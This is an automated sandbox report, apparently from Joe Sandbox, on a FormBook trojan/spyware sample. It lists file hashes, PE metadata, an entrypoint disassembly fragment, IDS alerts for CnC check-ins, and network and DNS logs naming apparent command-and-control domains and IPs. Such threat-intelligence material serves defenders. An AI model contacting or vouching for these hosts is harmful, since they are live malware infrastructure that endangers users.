                                                                                                        https://www.staciesellslka.com/wp-content/uploads/fusion-icons/psychology-v1.1/fonts/psychology.ttf?rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        https://www.staciesellslka.com/wp-json/rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        https://www.google.com/images/branding/product/ico/googleg_lodp.icorundll32.exe, 00000008.00000002.832505991.0000000006F50000.00000004.00000020.00020000.00000000.sdmp, j-E8-1M.8.drfalse
                                                                                                          high
                                                                                                          https://plus.google.com/u/0/102310483732773374239rundll32.exe, 00000008.00000002.831753356.00000000055E4000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            http://www.staciesellslka.com/wp-content/uploads/2023/02/logo-500.fw_.pngrundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            unknown
                                                                                                            https://api.w.org/rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://www.staciesellslka.com/wp-content/uploads/fusion-gfonts/o-0IIpQlx3QUlC5A4PNr5TRA.woff2rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              unknown
Joe Sandbox Version: 36.0.0 Rainbow Opal
Analysis ID: 799425
Start date and time: 2023-02-06 14:35:06 +01:00
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 11m 21s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed: 8
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample file name: zeuhAxTIRX.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@9/1@13/13
EGA Information:
• Successful, ratio: 100%
HDC Information:
• Successful, ratio: 61.8% (good quality ratio 54.9%)
• Quality average: 71%
• Quality standard deviation: 33.3%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 58
• Number of non-executed functions: 140
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240s for sample files taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe
• Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
• Not all processes were analyzed, report is missing behavior information
                                                                                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                              • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
14:38:01 | API Interceptor | 953x Sleep call for process: explorer.exe modified
                                                                                                              No context
                                                                                                              No context
Process: C:\Windows\SysWOW64\rundll32.exe
File Type: SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 3, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 3
Category: dropped
Size (bytes): 94208
Entropy (8bit): 1.2880737026424216
Encrypted: false
SSDEEP: 192:Qo1/8dpUXbSzTPJPQ6YVucbj8Ewn7PrH944:QS/inojVucbj8Ewn7b944
MD5: 5F02C426BCF0D3E3DC81F002F9125663
SHA1: EA50920666E30250E4BE05194FA7B3F44967BE94
SHA-256: DF93CD763CFEC79473D0DCF58C77D45C99D246CE347652BF215A97D8D1267EFA
SHA-512: 53EFE8F752484B48C39E1ABFBA05840FF2B968DE2BCAE16287877F69BABE8C54617E76C6953A22789043E27C9CCA9DB4FED5D2C2A512CBDDB5015F4CAB57C198
Malicious: false
Reputation: high, very likely benign file
Preview: SQLite format
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.99334968669697
TrID:
• Win32 Executable (generic) a (10002005/4) 99.98%
• DOS Executable Generic (2002/1) 0.02%
File name: zeuhAxTIRX.exe
File size: 186368
MD5: 271ae718b77b74826bb47fa7495eb565
SHA1: 45c8612d99bc2d05fb9cf42c1d84631c8e68b479
SHA256: c0fd42b42f88ead8da8a49c472155197542576a4804fb270118292dfc5d40b77
SHA512: fda1e69b4572abdf72907dc2f8c29a4495950e213baffab1b957a1e07e18a80ec3eb3c7baf8532bc8f3843976272353afeea46d0c86b27e9d46c7db1b78b50e4
SSDEEP: 3072:MVuepedbUYQvADcHsH9BgdjTsFQ3ij/ZgP/bVFKWT8D5fxA0PI4sSh6w95V:MVbedopvAAEBWO6gn5rPRsu
TLSH: 3204223152E18389CC38E6F34D1C3D7D36A88442A938B1161BF97299F3DB5687DACA50
                                                                                                              File Content Preview:MZER.....X.......<......(...............................................!..L.!This program cannot be run in DOS mode....$.........l..}...}...}.......}.......}.......}..Rich.}..................PE..L.....[E..........................................@........
Icon Hash: 00828e8e8686b000
Entrypoint: 0x4012e0
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp: 0x455BD5AF [Thu Nov 16 03:06:23 2006 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 6
OS Version Minor: 0
File Version Major: 6
File Version Minor: 0
Subsystem Version Major: 6
Subsystem Version Minor: 0
Import Hash:
                                                                                                              Instruction
                                                                                                              push ebp
                                                                                                              mov ebp, esp
                                                                                                              sub esp, 000003E8h
                                                                                                              push 000003C4h
                                                                                                              lea eax, dword ptr [ebp-000003E4h]
                                                                                                              push 00000000h
                                                                                                              push eax
                                                                                                              mov dword ptr [ebp-000003E8h], 00000000h
                                                                                                              call 00007FDD2CC64B1Fh
                                                                                                              call 00007FDD2CC6563Ah
                                                                                                              xorps xmm0, xmm0
                                                                                                              movq qword ptr [ebp-12h], xmm0
                                                                                                              movq qword ptr [ebp-00000258h], xmm0
                                                                                                              mov dword ptr [ebp-000000C0h], eax
                                                                                                              movq qword ptr [ebp-00000268h], xmm0
                                                                                                              movq qword ptr [ebp-00000260h], xmm0
                                                                                                              mov dword ptr [ebp-1Ch], 9E1C187Dh
                                                                                                              mov dword ptr [ebp-18h], DC2BB132h
                                                                                                              movq xmm0, qword ptr [ebp-1Ch]
                                                                                                              mov dword ptr [ebp-0Ah], 00000000h
                                                                                                              mov eax, dword ptr [ebp-0Ch]
                                                                                                              mov dword ptr [ebp-00000258h], eax
                                                                                                              mov ax, word ptr [ebp-08h]
                                                                                                              movq qword ptr [ebp-00000268h], xmm0
                                                                                                              mov word ptr [ebp-14h], 006Eh
                                                                                                              movq xmm0, qword ptr [ebp-14h]
                                                                                                              mov word ptr [ebp-00000254h], ax
                                                                                                              xor eax, eax
                                                                                                              movq qword ptr [ebp-00000260h], xmm0
                                                                                                              xorps xmm0, xmm0
                                                                                                              movq qword ptr [ebp-38h], xmm0
                                                                                                              mov word ptr [ebp-34h], ax
                                                                                                              mov byte ptr [ebp-32h], al
                                                                                                              movq qword ptr [ebp-48h], xmm0
                                                                                                              movq qword ptr [ebp-40h], xmm0
                                                                                                              mov dword ptr [ebp-1Ch], 6E678F01h
                                                                                                              mov eax, dword ptr [ebp-1Ch]
                                                                                                              xor eax, 03FB0163h
                                                                                                              mov dword ptr [ebp-18h], 0000003Dh
                                                                                                              Programming Language:
                                                                                                              • [C++] VS2012 build 50727
                                                                                                              • [ASM] VS2012 build 50727
                                                                                                              • [LNK] VS2012 build 50727
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x2d3d4 | 0x2d400 | False | 0.996336541781768 | data | 7.997908848134215 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
02/06/23-14:39:32.673954 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49711 | 80 | 192.168.2.4 | 199.59.243.222
02/06/23-14:39:32.673954 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49711 | 80 | 192.168.2.4 | 199.59.243.222
02/06/23-14:39:32.673954 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49711 | 80 | 192.168.2.4 | 199.59.243.222
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                              Feb 6, 2023 14:39:08.065886974 CET4970580192.168.2.4132.148.233.235
                                                                                                              Feb 6, 2023 14:39:08.232201099 CET8049705132.148.233.235192.168.2.4
                                                                                                              Feb 6, 2023 14:39:08.339430094 CET8049705132.148.233.235192.168.2.4
                                                                                                              Feb 6, 2023 14:39:08.339492083 CET8049705132.148.233.235192.168.2.4
                                                                                                              Feb 6, 2023 14:39:08.339524984 CET8049705132.148.233.235192.168.2.4
                                                                                                              Feb 6, 2023 14:39:08.339555979 CET8049705132.148.233.235192.168.2.4
                                                                                                              Feb 6, 2023 14:39:08.339586973 CET8049705132.148.233.235192.168.2.4
                                                                                                              Feb 6, 2023 14:39:08.339618921 CET8049705132.148.233.235192.168.2.4
                                                                                                              Feb 6, 2023 14:39:08.339648962 CET8049705132.148.233.235192.168.2.4
                                                                                                              Feb 6, 2023 14:39:08.339675903 CET8049705132.148.233.235192.168.2.4
                                                                                                              Feb 6, 2023 14:39:08.339798927 CET4970580192.168.2.4132.148.233.235
                                                                                                              Feb 6, 2023 14:39:08.340040922 CET4970580192.168.2.4132.148.233.235
                                                                                                              Feb 6, 2023 14:39:08.349338055 CET8049705132.148.233.235192.168.2.4
                                                                                                              Feb 6, 2023 14:39:08.349756002 CET8049705132.148.233.235192.168.2.4
                                                                                                              Feb 6, 2023 14:39:08.349992037 CET4970580192.168.2.4132.148.233.235
                                                                                                              Feb 6, 2023 14:39:08.506148100 CET8049705132.148.233.235192.168.2.4
                                                                                                              Feb 6, 2023 14:39:08.506194115 CET8049705132.148.233.235192.168.2.4
                                                                                                              Feb 6, 2023 14:39:08.506213903 CET8049705132.148.233.235192.168.2.4
                                                                                                              Feb 6, 2023 14:39:08.506233931 CET8049705132.148.233.235192.168.2.4
                                                                                                              Feb 6, 2023 14:39:08.506253958 CET8049705132.148.233.235192.168.2.4
                                                                                                              Feb 6, 2023 14:39:08.506273031 CET8049705132.148.233.235192.168.2.4
                                                                                                              Feb 6, 2023 14:39:08.506293058 CET8049705132.148.233.235192.168.2.4
                                                                                                              Feb 6, 2023 14:39:08.506311893 CET8049705132.148.233.235192.168.2.4
                                                                                                              Feb 6, 2023 14:39:08.506330013 CET8049705132.148.233.235192.168.2.4
                                                                                                              Feb 6, 2023 14:39:08.506406069 CET4970580192.168.2.4132.148.233.235
                                                                                                              Feb 6, 2023 14:39:08.506485939 CET4970580192.168.2.4132.148.233.235
                                                                                                              Feb 6, 2023 14:39:08.506563902 CET8049705132.148.233.235192.168.2.4
                                                                                                              Feb 6, 2023 14:39:08.506622076 CET4970580192.168.2.4132.148.233.235
                                                                                                              Feb 6, 2023 14:39:08.516287088 CET8049705132.148.233.235192.168.2.4
                                                                                                              Feb 6, 2023 14:39:08.516321898 CET8049705132.148.233.235192.168.2.4
                                                                                                              Feb 6, 2023 14:39:08.516546011 CET4970580192.168.2.4132.148.233.235
                                                                                                              Feb 6, 2023 14:39:08.672820091 CET8049705132.148.233.235192.168.2.4
                                                                                                              Feb 6, 2023 14:39:08.672902107 CET8049705132.148.233.235192.168.2.4
                                                                                                              Feb 6, 2023 14:39:08.672965050 CET8049705132.148.233.235192.168.2.4
                                                                                                              Feb 6, 2023 14:39:08.673023939 CET8049705132.148.233.235192.168.2.4
                                                                                                              Feb 6, 2023 14:39:08.673090935 CET8049705132.148.233.235192.168.2.4
                                                                                                              Feb 6, 2023 14:39:08.673151016 CET4970580192.168.2.4132.148.233.235
                                                                                                              Feb 6, 2023 14:39:08.673165083 CET8049705132.148.233.235192.168.2.4
                                                                                                              Feb 6, 2023 14:39:08.673197985 CET4970580192.168.2.4132.148.233.235
                                                                                                              Feb 6, 2023 14:39:08.673227072 CET8049705132.148.233.235192.168.2.4
                                                                                                              Feb 6, 2023 14:39:08.673249960 CET4970580192.168.2.4132.148.233.235
                                                                                                              Feb 6, 2023 14:39:08.673291922 CET8049705132.148.233.235192.168.2.4
                                                                                                              Feb 6, 2023 14:39:08.673350096 CET8049705132.148.233.235192.168.2.4
                                                                                                              Feb 6, 2023 14:39:08.673506975 CET8049705132.148.233.235192.168.2.4
                                                                                                              Feb 6, 2023 14:39:08.673604012 CET8049705132.148.233.235192.168.2.4
                                                                                                              Feb 6, 2023 14:39:08.673629045 CET4970580192.168.2.4132.148.233.235
                                                                                                              Feb 6, 2023 14:39:08.673629045 CET4970580192.168.2.4132.148.233.235
                                                                                                              Feb 6, 2023 14:39:08.673665047 CET8049705132.148.233.235192.168.2.4
                                                                                                              Feb 6, 2023 14:39:08.673722029 CET8049705132.148.233.235192.168.2.4
                                                                                                              Feb 6, 2023 14:39:08.673727989 CET4970580192.168.2.4132.148.233.235
                                                                                                              Feb 6, 2023 14:39:08.673779964 CET8049705132.148.233.235192.168.2.4
                                                                                                              Feb 6, 2023 14:39:08.673896074 CET4970580192.168.2.4132.148.233.235
                                                                                                              Feb 6, 2023 14:39:08.683639050 CET8049705132.148.233.235192.168.2.4
                                                                                                              Feb 6, 2023 14:39:08.683717012 CET8049705132.148.233.235192.168.2.4
                                                                                                              Feb 6, 2023 14:39:08.683918953 CET4970580192.168.2.4132.148.233.235
                                                                                                              Feb 6, 2023 14:39:08.840850115 CET8049705132.148.233.235192.168.2.4
                                                                                                              Feb 6, 2023 14:39:08.841207027 CET8049705132.148.233.235192.168.2.4
                                                                                                              Feb 6, 2023 14:39:08.841234922 CET8049705132.148.233.235192.168.2.4
                                                                                                              Feb 6, 2023 14:39:08.841259956 CET8049705132.148.233.235192.168.2.4
                                                                                                              Feb 6, 2023 14:39:08.841284990 CET8049705132.148.233.235192.168.2.4
                                                                                                              Feb 6, 2023 14:39:08.841310024 CET8049705132.148.233.235192.168.2.4
                                                                                                              Feb 6, 2023 14:39:08.841382980 CET4970580192.168.2.4132.148.233.235
                                                                                                              Feb 6, 2023 14:39:08.841463089 CET4970580192.168.2.4132.148.233.235
                                                                                                              Feb 6, 2023 14:39:08.841463089 CET4970580192.168.2.4132.148.233.235
                                                                                                              Feb 6, 2023 14:39:08.841723919 CET8049705132.148.233.235192.168.2.4
                                                                                                              Feb 6, 2023 14:39:08.841829062 CET8049705132.148.233.235192.168.2.4
                                                                                                              Feb 6, 2023 14:39:08.841856003 CET8049705132.148.233.235192.168.2.4
                                                                                                              Feb 6, 2023 14:39:08.841886997 CET8049705132.148.233.235192.168.2.4
                                                                                                              Feb 6, 2023 14:39:08.841888905 CET4970580192.168.2.4132.148.233.235
                                                                                                              Feb 6, 2023 14:39:08.841917038 CET8049705132.148.233.235192.168.2.4
                                                                                                              Feb 6, 2023 14:39:08.841981888 CET4970580192.168.2.4132.148.233.235
                                                                                                              Feb 6, 2023 14:39:08.842060089 CET4970580192.168.2.4132.148.233.235
                                                                                                              Feb 6, 2023 14:39:08.842202902 CET4970580192.168.2.4132.148.233.235
                                                                                                              Feb 6, 2023 14:39:09.008445978 CET8049705132.148.233.235192.168.2.4
                                                                                                              Feb 6, 2023 14:39:14.184139967 CET4970680192.168.2.4154.205.192.37
                                                                                                              Feb 6, 2023 14:39:14.354250908 CET8049706154.205.192.37192.168.2.4
                                                                                                              Feb 6, 2023 14:39:14.354490042 CET4970680192.168.2.4154.205.192.37
                                                                                                              Feb 6, 2023 14:39:14.383770943 CET4970680192.168.2.4154.205.192.37
                                                                                                              Feb 6, 2023 14:39:14.553841114 CET8049706154.205.192.37192.168.2.4
                                                                                                              Feb 6, 2023 14:39:14.559606075 CET8049706154.205.192.37192.168.2.4
                                                                                                              Feb 6, 2023 14:39:14.559638977 CET8049706154.205.192.37192.168.2.4
                                                                                                              Feb 6, 2023 14:39:14.559870958 CET4970680192.168.2.4154.205.192.37
                                                                                                              Feb 6, 2023 14:39:15.898736000 CET4970680192.168.2.4154.205.192.37
                                                                                                              Feb 6, 2023 14:39:16.914680004 CET4970780192.168.2.4154.205.192.37
                                                                                                              Feb 6, 2023 14:39:17.079495907 CET8049707154.205.192.37192.168.2.4
                                                                                                              Feb 6, 2023 14:39:17.079694986 CET4970780192.168.2.4154.205.192.37
                                                                                                              Feb 6, 2023 14:39:17.079830885 CET4970780192.168.2.4154.205.192.37
                                                                                                              Feb 6, 2023 14:39:17.244308949 CET8049707154.205.192.37192.168.2.4
                                                                                                              Feb 6, 2023 14:39:17.246885061 CET8049707154.205.192.37192.168.2.4
                                                                                                              Feb 6, 2023 14:39:17.246912003 CET8049707154.205.192.37192.168.2.4
                                                                                                              Feb 6, 2023 14:39:17.247147083 CET4970780192.168.2.4154.205.192.37
                                                                                                              Feb 6, 2023 14:39:17.247313976 CET4970780192.168.2.4154.205.192.37
                                                                                                              Feb 6, 2023 14:39:17.412523031 CET8049707154.205.192.37192.168.2.4
                                                                                                              Feb 6, 2023 14:39:22.330636978 CET4970880192.168.2.4217.76.156.252
                                                                                                              Feb 6, 2023 14:39:22.383141994 CET8049708217.76.156.252192.168.2.4
                                                                                                              Feb 6, 2023 14:39:22.383295059 CET4970880192.168.2.4217.76.156.252
                                                                                                              Feb 6, 2023 14:39:22.384221077 CET4970880192.168.2.4217.76.156.252
                                                                                                              Feb 6, 2023 14:39:22.436633110 CET8049708217.76.156.252192.168.2.4
                                                                                                              Feb 6, 2023 14:39:22.443350077 CET8049708217.76.156.252192.168.2.4
                                                                                                              Feb 6, 2023 14:39:22.443392992 CET8049708217.76.156.252192.168.2.4
                                                                                                              Feb 6, 2023 14:39:22.443420887 CET8049708217.76.156.252192.168.2.4
                                                                                                              Feb 6, 2023 14:39:22.443444967 CET4970880192.168.2.4217.76.156.252
                                                                                                              Feb 6, 2023 14:39:22.443449020 CET8049708217.76.156.252192.168.2.4
                                                                                                              Feb 6, 2023 14:39:22.443475962 CET8049708217.76.156.252192.168.2.4
                                                                                                              Feb 6, 2023 14:39:22.443487883 CET4970880192.168.2.4217.76.156.252
                                                                                                              Feb 6, 2023 14:39:22.443501949 CET8049708217.76.156.252192.168.2.4
                                                                                                              Feb 6, 2023 14:39:22.443523884 CET8049708217.76.156.252192.168.2.4
                                                                                                              Feb 6, 2023 14:39:22.443543911 CET8049708217.76.156.252192.168.2.4
                                                                                                              Feb 6, 2023 14:39:22.443547010 CET4970880192.168.2.4217.76.156.252
                                                                                                              Feb 6, 2023 14:39:22.443587065 CET4970880192.168.2.4217.76.156.252
                                                                                                              Feb 6, 2023 14:39:23.900613070 CET4970880192.168.2.4217.76.156.252
                                                                                                              Feb 6, 2023 14:39:24.933696985 CET4970980192.168.2.4217.76.156.252
                                                                                                              Feb 6, 2023 14:39:24.986774921 CET8049709217.76.156.252192.168.2.4
                                                                                                              Feb 6, 2023 14:39:24.987087965 CET4970980192.168.2.4217.76.156.252
                                                                                                              Feb 6, 2023 14:39:24.987344980 CET4970980192.168.2.4217.76.156.252
                                                                                                              Feb 6, 2023 14:39:25.039514065 CET8049709217.76.156.252192.168.2.4
                                                                                                              Feb 6, 2023 14:39:25.047147989 CET8049709217.76.156.252192.168.2.4
                                                                                                              Feb 6, 2023 14:39:25.047189951 CET8049709217.76.156.252192.168.2.4
                                                                                                              Feb 6, 2023 14:39:25.047219038 CET8049709217.76.156.252192.168.2.4
                                                                                                              Feb 6, 2023 14:39:25.047246933 CET8049709217.76.156.252192.168.2.4
                                                                                                              Feb 6, 2023 14:39:25.047274113 CET8049709217.76.156.252192.168.2.4
                                                                                                              Feb 6, 2023 14:39:25.047297955 CET8049709217.76.156.252192.168.2.4
                                                                                                              Feb 6, 2023 14:39:25.047317028 CET8049709217.76.156.252192.168.2.4
                                                                                                              Feb 6, 2023 14:39:25.047337055 CET8049709217.76.156.252192.168.2.4
                                                                                                              Feb 6, 2023 14:39:25.047370911 CET4970980192.168.2.4217.76.156.252
                                                                                                              Feb 6, 2023 14:39:25.047506094 CET4970980192.168.2.4217.76.156.252
                                                                                                              Feb 6, 2023 14:39:25.053149939 CET4970980192.168.2.4217.76.156.252
                                                                                                              Feb 6, 2023 14:39:25.105470896 CET8049709217.76.156.252192.168.2.4
                                                                                                              Feb 6, 2023 14:39:30.099385977 CET4971080192.168.2.4199.59.243.222
                                                                                                              Feb 6, 2023 14:39:30.120192051 CET8049710199.59.243.222192.168.2.4
                                                                                                              Feb 6, 2023 14:39:30.120335102 CET4971080192.168.2.4199.59.243.222
                                                                                                              Feb 6, 2023 14:39:30.120506048 CET4971080192.168.2.4199.59.243.222
                                                                                                              Feb 6, 2023 14:39:30.139801979 CET8049710199.59.243.222192.168.2.4
                                                                                                              Feb 6, 2023 14:39:30.323227882 CET8049710199.59.243.222192.168.2.4
                                                                                                              Feb 6, 2023 14:39:30.323259115 CET8049710199.59.243.222192.168.2.4
                                                                                                              Feb 6, 2023 14:39:30.323276997 CET8049710199.59.243.222192.168.2.4
                                                                                                              Feb 6, 2023 14:39:30.323441029 CET4971080192.168.2.4199.59.243.222
                                                                                                              Feb 6, 2023 14:39:30.337869883 CET8049710199.59.243.222192.168.2.4
                                                                                                              Feb 6, 2023 14:39:30.338646889 CET4971080192.168.2.4199.59.243.222
                                                                                                              Feb 6, 2023 14:39:31.634628057 CET4971080192.168.2.4199.59.243.222
                                                                                                              Feb 6, 2023 14:39:32.652720928 CET4971180192.168.2.4199.59.243.222
                                                                                                              Feb 6, 2023 14:39:32.673559904 CET8049711199.59.243.222192.168.2.4
                                                                                                              Feb 6, 2023 14:39:32.673746109 CET4971180192.168.2.4199.59.243.222
                                                                                                              Feb 6, 2023 14:39:32.673954010 CET4971180192.168.2.4199.59.243.222
                                                                                                              Feb 6, 2023 14:39:32.693361998 CET8049711199.59.243.222192.168.2.4
                                                                                                              Feb 6, 2023 14:39:32.876430988 CET8049711199.59.243.222192.168.2.4
                                                                                                              Feb 6, 2023 14:39:32.876487017 CET8049711199.59.243.222192.168.2.4
                                                                                                              Feb 6, 2023 14:39:32.876513958 CET8049711199.59.243.222192.168.2.4
                                                                                                              Feb 6, 2023 14:39:32.876537085 CET8049711199.59.243.222192.168.2.4
                                                                                                              Feb 6, 2023 14:39:32.876702070 CET4971180192.168.2.4199.59.243.222
                                                                                                              Feb 6, 2023 14:39:32.877068996 CET4971180192.168.2.4199.59.243.222
                                                                                                              Feb 6, 2023 14:39:32.892798901 CET8049711199.59.243.222192.168.2.4
                                                                                                              Feb 6, 2023 14:39:32.892909050 CET4971180192.168.2.4199.59.243.222
                                                                                                              Feb 6, 2023 14:39:32.896514893 CET8049711199.59.243.222192.168.2.4
                                                                                                              Feb 6, 2023 14:39:38.067676067 CET4971280192.168.2.4156.255.170.114
                                                                                                              Feb 6, 2023 14:39:38.267317057 CET8049712156.255.170.114192.168.2.4
                                                                                                              Feb 6, 2023 14:39:38.267632961 CET4971280192.168.2.4156.255.170.114
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Feb 6, 2023 14:38:20.564807892 CET | 192.168.2.4 | 8.8.8.8 | 0x4c3c | Standard query (0) | www.utmedicined.com | A (IP address) | IN (0x0001) | false
Feb 6, 2023 14:38:31.037887096 CET | 192.168.2.4 | 8.8.8.8 | 0x5ce9 | Standard query (0) | www.b-yy.xyz | A (IP address) | IN (0x0001) | false
Feb 6, 2023 14:38:38.903697014 CET | 192.168.2.4 | 8.8.8.8 | 0xf4e1 | Standard query (0) | www.fildoor.store | A (IP address) | IN (0x0001) | false
Feb 6, 2023 14:38:46.743694067 CET | 192.168.2.4 | 8.8.8.8 | 0x64db | Standard query (0) | www.parkhomenko-zinaida.ru | A (IP address) | IN (0x0001) | false
Feb 6, 2023 14:38:56.789658070 CET | 192.168.2.4 | 8.8.8.8 | 0x861e | Standard query (0) | www.dezella.xyz | A (IP address) | IN (0x0001) | false
Feb 6, 2023 14:39:05.182425022 CET | 192.168.2.4 | 8.8.8.8 | 0xb06b | Standard query (0) | www.staciesellslka.com | A (IP address) | IN (0x0001) | false
Feb 6, 2023 14:39:13.872448921 CET | 192.168.2.4 | 8.8.8.8 | 0x7c0e | Standard query (0) | www.gmbuxie.net | A (IP address) | IN (0x0001) | false
Feb 6, 2023 14:39:22.280570030 CET | 192.168.2.4 | 8.8.8.8 | 0x80dc | Standard query (0) | www.lastmilerent.com | A (IP address) | IN (0x0001) | false
Feb 6, 2023 14:39:30.073498964 CET | 192.168.2.4 | 8.8.8.8 | 0xb1a9 | Standard query (0) | www.moneycarrewards.com | A (IP address) | IN (0x0001) | false
Feb 6, 2023 14:39:37.894309044 CET | 192.168.2.4 | 8.8.8.8 | 0x2a76 | Standard query (0) | www.cmproutdoors.com | A (IP address) | IN (0x0001) | false
Feb 6, 2023 14:39:46.228657961 CET | 192.168.2.4 | 8.8.8.8 | 0x65a9 | Standard query (0) | www.ontheverge.wales | A (IP address) | IN (0x0001) | false
Feb 6, 2023 14:39:53.873554945 CET | 192.168.2.4 | 8.8.8.8 | 0x2a1a | Standard query (0) | www.0w3jy.com | A (IP address) | IN (0x0001) | false
Feb 6, 2023 14:40:02.740058899 CET | 192.168.2.4 | 8.8.8.8 | 0xc394 | Standard query (0) | www.frogair.online | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Feb 6, 2023 14:38:20.710185051 CET | 8.8.8.8 | 192.168.2.4 | 0x4c3c | No error (0) | www.utmedicined.com | - | 63.141.242.45 | A (IP address) | IN (0x0001) | false
Feb 6, 2023 14:38:31.062824011 CET | 8.8.8.8 | 192.168.2.4 | 0x5ce9 | No error (0) | www.b-yy.xyz | - | 172.67.156.58 | A (IP address) | IN (0x0001) | false
Feb 6, 2023 14:38:31.062824011 CET | 8.8.8.8 | 192.168.2.4 | 0x5ce9 | No error (0) | www.b-yy.xyz | - | 104.21.74.71 | A (IP address) | IN (0x0001) | false
Feb 6, 2023 14:38:38.982378006 CET | 8.8.8.8 | 192.168.2.4 | 0xf4e1 | No error (0) | www.fildoor.store | - | 87.236.16.107 | A (IP address) | IN (0x0001) | false
Feb 6, 2023 14:38:46.774025917 CET | 8.8.8.8 | 192.168.2.4 | 0x64db | No error (0) | www.parkhomenko-zinaida.ru | parkhomenko-zinaida.ru | - | CNAME (Canonical name) | IN (0x0001) | false
Feb 6, 2023 14:38:46.774025917 CET | 8.8.8.8 | 192.168.2.4 | 0x64db | No error (0) | parkhomenko-zinaida.ru | - | 185.215.4.36 | A (IP address) | IN (0x0001) | false
Feb 6, 2023 14:38:56.813150883 CET | 8.8.8.8 | 192.168.2.4 | 0x861e | No error (0) | www.dezella.xyz | - | 199.192.28.121 | A (IP address) | IN (0x0001) | false
Feb 6, 2023 14:39:05.206569910 CET | 8.8.8.8 | 192.168.2.4 | 0xb06b | No error (0) | www.staciesellslka.com | staciesellslka.com | - | CNAME (Canonical name) | IN (0x0001) | false
Feb 6, 2023 14:39:05.206569910 CET | 8.8.8.8 | 192.168.2.4 | 0xb06b | No error (0) | staciesellslka.com | - | 132.148.233.235 | A (IP address) | IN (0x0001) | false
Feb 6, 2023 14:39:14.182938099 CET | 8.8.8.8 | 192.168.2.4 | 0x7c0e | No error (0) | www.gmbuxie.net | - | 154.205.192.37 | A (IP address) | IN (0x0001) | false
Feb 6, 2023 14:39:22.328759909 CET | 8.8.8.8 | 192.168.2.4 | 0x80dc | No error (0) | www.lastmilerent.com | - | 217.76.156.252 | A (IP address) | IN (0x0001) | false
